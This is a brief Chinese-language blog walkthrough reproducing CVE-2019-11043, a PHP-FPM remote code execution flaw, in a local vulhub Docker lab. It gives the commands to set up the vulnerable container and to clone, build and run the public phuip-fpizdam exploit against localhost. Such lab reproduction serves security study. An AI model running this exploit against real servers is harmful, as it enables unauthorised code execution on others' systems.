CVE2019-11043漏洞復現

hiddenCarry發表於2020-10-05

知其然,知其所以然。

原理:https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf

docker使用別人搭建好的環境

git clone https://github.com/vulhub/vulhub.git		//git將vulhub下載到本地
cd vulhub/php/CVE-2019-11043						//進入CVE-2019-11043的目錄
docker-compose up -d								//下載啟動容器
docker ps			//檢視docker程式

出現如下截圖,說明成功。
在這裡插入圖片描述

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v&& go build
go run . "http:127.0.0.1:8080/index.php"

在這裡插入圖片描述發現利用成功。

在這裡插入圖片描述

相關文章